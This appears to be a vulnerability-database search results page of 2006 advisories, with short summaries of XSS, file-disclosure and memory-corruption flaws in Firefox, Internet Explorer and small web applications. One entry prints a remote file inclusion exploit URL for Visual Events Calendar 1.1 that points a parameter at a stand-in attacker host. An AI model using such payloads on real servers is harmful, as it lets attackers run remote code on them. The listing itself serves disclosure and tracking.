9028 matches found

Exploit DB
added 2006/08/07 12:0 a.m. | 30 views

Visual Events Calendar 1.1 - 'cfg_dir' Remote File Inclusion

title: Visual Events Calendar v1.1 cfgdir Remote Inclusion Vulnerability Author: xoron script: Visual Events Calendar v1.1 Class : Remote cont@ct: x0r0nathotmaildotcom CODE: include $cfgdir."customizetext.php"; Exploit: http://www.site.com/path/calendar.php?cfgdir=http://evilscripts? Thanx :...

7.4 AI score
Exploits: 0

Gentoo Linux
added 2006/08/03 12:0 a.m. | 49 views

Mozilla Firefox: Multiple vulnerabilities

Background: Mozilla Firefox is a redesign of the Mozilla Navigator component. The goal is to produce a cross-platform stand-alone browser application. Description: The following vulnerabilities have been reported: Benjamin Smedberg discovered that chrome URLs could be made to reference remote file...

7.5 CVSS | 7.3 AI score | 0.77265 EPSS
Exploits: 11

RedHat Linux
added 2006/07/27 7:53 p.m. | 2 views

security flaw

Mozilla Firefox 1.5 before 1.5.0.5, Thunderbird before 1.5.0.5, and SeaMonkey before 1.0.3 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via simultaneous XPCOM events, which causes a timer object to be deleted in a way that triggers memory corrupti...

7.5 CVSS | 7.7 AI score | 0.05938 EPSS
Exploits: 0 | References: 4

myhack58
added 2006/07/15 12:0 a.m. | 34 views

Hacking skills: in the Real movie put Trojan horse-vulnerability warning-the black bar safety net

Frequently encountered rm the movie plays when pop-up web pages, has been do not know how, a few days ago saw the mass of software in an article only to know the insertion and removal method, a good dongdong dare not exclusive, in the online search of the three articles, The to everyone. In the...

7.1 AI score
Exploits: 0

NVD
added 2006/07/06 8:5 p.m. | 18 views

CVE-2006-3383

Cross-site scripting (XSS) vulnerability in index.php in mAds 1.0 allows remote attackers to inject arbitrary web script or HTML via JavaScript events such as onmouseover within a URL. NOTE: the provenance of this information is unknown; the details are obtained solely from third party reports...

5.8 CVSS | 5.5 AI score | 0.01146 EPSS
Exploits: 0 | References: 3

Cvelist
added 2006/07/06 8:0 p.m. | 21 views

CVE-2006-3383

Cross-site scripting (XSS) vulnerability in index.php in mAds 1.0 allows remote attackers to inject arbitrary web script or HTML via JavaScript events such as onmouseover within a URL. NOTE: the provenance of this information is unknown; the details are obtained solely from third party reports...

5.5 AI score | 0.01146 EPSS
Exploits: 0 | References: 3

NVD
added 2006/06/16 10:2 a.m. | 15 views

CVE-2006-3052

Cross-site scripting (XSS) vulnerability in Event Registration allows remote attackers to inject arbitrary web script or HTML via the (1) eventid parameter to view-event-details.php or (2) selectevents parameter to event-registration.php. NOTE: the provenance of this information is unknown; the details...

6.8 CVSS | 5.6 AI score | 0.01808 EPSS
Exploits: 0 | References: 4

Prion
added 2006/06/07 4:2 p.m. | 18 views

Unrestricted file upload

Internet Explorer 6 allows user-assisted remote attackers to read arbitrary files by tricking a user into typing the characters of the target filename in a text box and using the OnKeyDown, OnKeyPress, and OnKeyUp Javascript keystroke events to change the focus and cause those characters to be...

4 CVSS | 6.8 AI score | 0.1261 EPSS
Exploits: 0 | References: 5 | Affected Software: 1

Cvelist
added 2006/06/07 4:0 p.m. | 25 views

CVE-2006-2900

Internet Explorer 6 allows user-assisted remote attackers to read arbitrary files by tricking a user into typing the characters of the target filename in a text box and using the OnKeyDown, OnKeyPress, and OnKeyUp Javascript keystroke events to change the focus and cause those characters to be...

6.6 AI score | 0.1261 EPSS
Exploits: 0 | References: 5

CVE
added 2006/06/07 4:0 p.m. | 118 views

CVE-2006-2900

CVE-2006-2900 concerns Internet Explorer 6 and an information-disclosure issue where a user-assisted attacker could cause file content disclosure by manipulating focus via OnKeyDown/OnKeyPress/OnKeyUp events and inserting characters into a file upload control. The core vector is a keystroke hijac...

4 CVSS | 6.5 AI score | 0.1261 EPSS
Exploits: 0 | References: 5 | Affected Software: 2

UbuntuCve
added 2006/06/07 10:2 a.m. | 39 views

CVE-2006-2894

Mozilla Firefox 1.5.0.4, 2.0.x before 2.0.0.8, Mozilla Suite 1.7.13, Mozilla SeaMonkey 1.0.2 and other versions before 1.1.5, and Netscape 8.1 and earlier allow user-assisted remote attackers to read arbitrary files by tricking a user into typing the characters of the target filename in a text bo...

4 CVSS | 6.1 AI score | 0.09648 EPSS
Exploits: 1 | References: 3

Prion
added 2006/06/07 10:2 a.m. | 22 views

Unrestricted file upload

Mozilla Firefox 1.5.0.4, 2.0.x before 2.0.0.8, Mozilla Suite 1.7.13, Mozilla SeaMonkey 1.0.2 and other versions before 1.1.5, and Netscape 8.1 and earlier allow user-assisted remote attackers to read arbitrary files by tricking a user into typing the characters of the target filename in a text bo...

4 CVSS | 6.4 AI score | 0.09648 EPSS
Exploits: 1 | References: 45 | Affected Software: 4

Cvelist
added 2006/06/07 10:0 a.m. | 24 views

CVE-2006-2894

Mozilla Firefox 1.5.0.4, 2.0.x before 2.0.0.8, Mozilla Suite 1.7.13, Mozilla SeaMonkey 1.0.2 and other versions before 1.1.5, and Netscape 8.1 and earlier allow user-assisted remote attackers to read arbitrary files by tricking a user into typing the characters of the target filename in a text bo...

6.2 AI score | 0.09648 EPSS
Exploits: 1 | References: 45

CVE
added 2006/05/12 9:0 p.m. | 48 views

CVE-2006-1439

CVE-2006-1439 affects NSSecureTextField in AppKit on Apple Mac OS X 10.4.6. The vulnerability: secure input is not re-enabled under certain circumstances, potentially allowing other window-session applications to monitor input characters and keyboard events. The description and related references...

2.1 CVSS | 6.2 AI score | 0.00414 EPSS
Exploits: 0 | References: 7 | Affected Software: 1

Prion
added 2006/05/02 10:2 a.m. | 15 views

Cross site scripting

Multiple cross-site scripting (XSS) vulnerabilities in TextFileBB 1.0.16 allow remote attackers to inject arbitrary web script or HTML via JavaScript events such as "onmouseover" in the (1) color, (2) size, or (3) url bbcode tags...

4.3 CVSS | 6 AI score | 0.0193 EPSS
Exploits: 1 | References: 7 | Affected Software: 1

NVD
added 2006/05/02 10:2 a.m. | 22 views

CVE-2006-2143

Multiple cross-site scripting (XSS) vulnerabilities in TextFileBB 1.0.16 allow remote attackers to inject arbitrary web script or HTML via JavaScript events such as "onmouseover" in the (1) color, (2) size, or (3) url bbcode tags...

4.3 CVSS | 5.8 AI score | 0.0193 EPSS
Exploits: 1 | References: 7

Cvelist
added 2006/05/02 10:0 a.m. | 25 views

CVE-2006-2143

Multiple cross-site scripting (XSS) vulnerabilities in TextFileBB 1.0.16 allow remote attackers to inject arbitrary web script or HTML via JavaScript events such as "onmouseover" in the (1) color, (2) size, or (3) url bbcode tags...

5.8 AI score | 0.0193 EPSS
Exploits: 1 | References: 7

CVE
added 2006/05/02 10:0 a.m. | 48 views

CVE-2006-2143

CVE-2006-2143 describes multiple XSS vulnerabilities in TextFileBB 1.0.16. The issue allows remote attackers to inject arbitrary JavaScript/HTML via onmouseover-based events in the (1) color, (2) size, or (3) url bbcode tags. Affected software: TextFileBB 1.0.16. Root cause: lack of proper input ...

4.3 CVSS | 5.8 AI score | 0.0193 EPSS
Exploits: 1 | References: 7 | Affected Software: 1

RedHat Linux
added 2006/04/14 3:54 p.m. | 38 views

Critical: Red Hat Security Advisory: firefox security update

Updated firefox packages that fix several security bugs are now available. This update has been rated as having critical security impact by the Red Hat Security Response Team. Updated 24 Apr 2006 The erratum text has been updated to include CVE-2006-0748, an issue fixed by these erratum packages...

10 CVSS | 6.1 AI score | 0.10487 EPSS
Exploits: 3 | References: 19

Packet Storm
added 2006/04/01 12:0 a.m. | 30 views

EV0102.txt

New eVuln Advisory: Maian Events SQL Injection Vulnerability http://evuln.com/vulns/102/summary.html --------------------Summary---------------- eVuln ID: EV0102 CVE: CVE-2006-1341 Software: Maian Events Software's Web Site: http://www.maianscriptworld.co.uk/ Versions: 1.0 Critical Level: Moderat...

7.5 CVSS | 6.7 AI score | 0.01381 EPSS
Exploits: 1